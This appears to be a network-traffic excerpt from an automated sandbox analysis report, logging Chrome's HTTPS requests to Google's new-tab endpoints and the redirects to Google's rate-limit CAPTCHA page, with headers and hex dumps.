                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-04-26 21:15:14 UTC1703INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:15:13 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: -1
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ge1NLg22yyjYAbxe_r776w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                Server: gws
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Accept-Ranges: none
                                                                                                Vary: Accept-Encoding
                                                                                                Connection: close
                                                                                                Transfer-Encoding: chunked
                                                                                                2024-04-26 21:15:14 UTC1703INData Raw: 31 33 30 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 79 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 68 69 6e 74 73 20 61 70 72 69 6c 20 32 36 22 2c 22 70 73 35 20 67 61 6d 65 73 22 2c 22 73 74 61 72 62 75 63 6b 73 20 64 72 69 6e 6b 73 20 68 61 6c 66 20 6f 66 66 22 2c 22 6d 61 72 76 69 6e 20 68 61 72 72 69 73 6f 6e 20 6a 72 20 6e 66 6c 20 64 72 61 66 74 22 2c 22 77 65 61 74 68 65 72 20 73 74 6f 72 6d 73 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 73 68 61 6d 72 6f 63 6b 20 67 6f 6c 64 65 6e 20 72 65 74 72 69 65 76 65 72 20 70 75 70 70 79 22 2c 22 68 6f 72 73 65 20 72 61 63 69 6e 67 20 6b 65 6e 74 75 63 6b 79 20 64 65 72 62 79 22 2c 22 62 6c 75 65 79 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67
                                                                                                Data Ascii: 1308)]}'["",["nyt connections hints april 26","ps5 games","starbucks drinks half off","marvin harrison jr nfl draft","weather storms tornadoes","shamrock golden retriever puppy","horse racing kentucky derby","bluey"],["","","","","","","",""],[],{"goog
                                                                                                2024-04-26 21:15:14 UTC1703INData Raw: 45 72 56 30 74 4c 56 6e 56 73 64 46 5a 35 62 56 56 77 63 48 46 54 62 58 4a 69 62 6c 52 54 51 6a 4a 75 56 56 6c 5a 53 47 64 49 52 30 46 51 4d 7a 63 77 63 31 63 30 61 47 68 57 62 48 68 61 52 7a 45 34 65 6c 52 35 63 7a 4e 69 54 46 4a 4d 56 33 52 73 64 44 42 56 51 55 64 55 53 31 59 30 55 44 4a 49 65 6e 46 33 4b 31 46 4f 4b 32 46 36 53 55 31 57 4d 48 41 7a 4d 6b 68 73 52 47 78 4e 61 6c 4a 4b 56 6b 78 54 64 6d 4e 79 57 46 64 44 53 6a 5a 35 54 6d 63 34 5a 6b 74 6f 5a 31 52 6e 4c 33 41 7a 4d 54 63 32 63 6d 46 49 64 44 52 58 63 57 4e 71 53 47 74 76 64 6b 63 30 56 6c 55 35 4f 56 45 78 4d 46 56 72 59 32 4a 48 52 30 31 46 53 46 42 69 57 69 39 30 62 32 68 47 4e 6c 56 45 63 7a 42 6b 55 55 56 45 57 55 74 6a 62 46 6c 4d 64 46 63 77 4f 45 35 4a 65 6c 55 31 61 6b 70 6a 55
                                                                                                Data Ascii: ErV0tLVnVsdFZ5bVVwcHFTbXJiblRTQjJuVVlZSGdIR0FQMzcwc1c0aGhWbHhaRzE4elR5czNiTFJMV3RsdDBVQUdUS1Y0UDJIenF3K1FOK2F6SU1WMHAzMkhsRGxNalJKVkxTdmNyWFdDSjZ5Tmc4ZktoZ1RnL3AzMTc2cmFIdDRXcWNqSGtvdkc0VlU5OVExMFVrY2JHR01FSFBiWi90b2hGNlVEczBkUUVEWUtjbFlMdFcwOE5JelU1akpjU
                                                                                                2024-04-26 21:15:14 UTC1474INData Raw: 6e 68 31 5a 47 39 43 4d 31 56 4b 63 55 38 32 4d 48 52 4d 56 58 5a 52 53 6b 64 4c 62 47 39 35 53 58 51 76 4d 55 74 48 4e 45 39 48 51 55 39 6a 53 45 64 51 4d 54 46 58 65 6b 68 6b 55 30 6c 6f 62 53 73 72 4f 57 4d 78 4d 31 64 75 61 58 51 77 55 32 64 32 4d 6b 4e 59 55 56 68 68 5a 57 39 7a 61 6e 51 30 61 48 51 34 52 6b 6c 36 61 47 38 31 62 31 68 72 52 47 39 42 56 48 51 31 4f 57 6c 44 55 44 55 32 65 54 52 32 61 45 64 31 62 6e 4e 6d 55 58 5a 34 64 69 74 6d 55 6c 63 31 54 54 64 52 55 7a 4a 79 4b 33 46 51 64 48 4e 75 63 54 64 32 59 55 6c 4d 56 46 59 77 52 6b 78 69 4e 6c 4a 44 4d 48 4e 46 59 6c 6c 72 53 55 4e 73 55 58 45 30 4e 44 4a 75 53 58 6c 51 59 6d 46 4f 59 55 64 59 52 45 70 44 4d 45 64 70 51 58 46 74 53 6d 78 53 56 45 56 6e 53 47 52 68 53 44 41 34 54 6b 35 49
                                                                                                Data Ascii: nh1ZG9CM1VKcU82MHRMVXZRSkdLbG95SXQvMUtHNE9HQU9jSEdQMTFXekhkU0lobSsrOWMxM1duaXQwU2d2MkNYUVhhZW9zanQ0aHQ4Rkl6aG81b1hrRG9BVHQ1OWlDUDU2eTR2aEd1bnNmUXZ4ditmUlc1TTdRUzJyK3FQdHNucTd2YUlMVFYwRkxiNlJDMHNFYllrSUNsUXE0NDJuSXlQYmFOYUdYREpDMEdpQXFtSmxSVEVnSGRhSDA4Tk5I
                                                                                                2024-04-26 21:15:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549712142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:13 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549713142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:13 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-04-26 21:15:14 UTC1843INHTTP/1.1 302 Found
                                                                                                Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                x-hallmonitor-challenge: CgwI4rKwsQYQ4PHPqgMSBGaBmNw
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Date: Fri, 26 Apr 2024 21:15:14 GMT
                                                                                                Server: gws
                                                                                                Content-Length: 458
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                Set-Cookie: NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE; expires=Sat, 26-Oct-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-04-26 21:15:14 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549714142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:13 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2024-04-26 21:15:14 UTC1761INHTTP/1.1 302 Found
                                                                                                Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                x-hallmonitor-challenge: CgwI4rKwsQYQ6uOupQESBGaBmNw
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Date: Fri, 26 Apr 2024 21:15:14 GMT
                                                                                                Server: gws
                                                                                                Content-Length: 417
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                Set-Cookie: NID=513=oetjuYuWwh2Fnv2QCWQRQPLZcsDTMDuVhCmk6WPzj9-iNMKJAjgm_D0WAGx_GU56bZRVY9hBHFVYhs_K7NfQENKIkt1Vyb-R18VFLUl-d5WiAfiWh4o-5GgypGmldDtdqVf6N3H_QKNhkPytT1_buTY1iY518dBDIDJl92-nhjw; expires=Sat, 26-Oct-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-04-26 21:15:14 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.549719142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:16 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
                                                                                                2024-04-26 21:15:16 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Content-Type: text/html
                                                                                                Server: HTTP server (unknown)
                                                                                                Content-Length: 3114
                                                                                                X-XSS-Protection: 0
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-04-26 21:15:16 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                2024-04-26 21:15:16 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 33 63 66 32 6c 62 52 31 68 55 6a 6d 78 76 35 72 6d 4c 34 67 38 68 68 4b 4a 34 30 5f 53 33 76 4f 58
                                                                                                Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="3cf2lbR1hUjmxv5rmL4g8hhKJ40_S3vOX
                                                                                                2024-04-26 21:15:16 UTC960INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.549721142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:16 UTC920OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
                                                                                                2024-04-26 21:15:16 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Content-Type: text/html
                                                                                                Server: HTTP server (unknown)
                                                                                                Content-Length: 3186
                                                                                                X-XSS-Protection: 0
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
                                                                                                2024-04-26 21:15:16 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
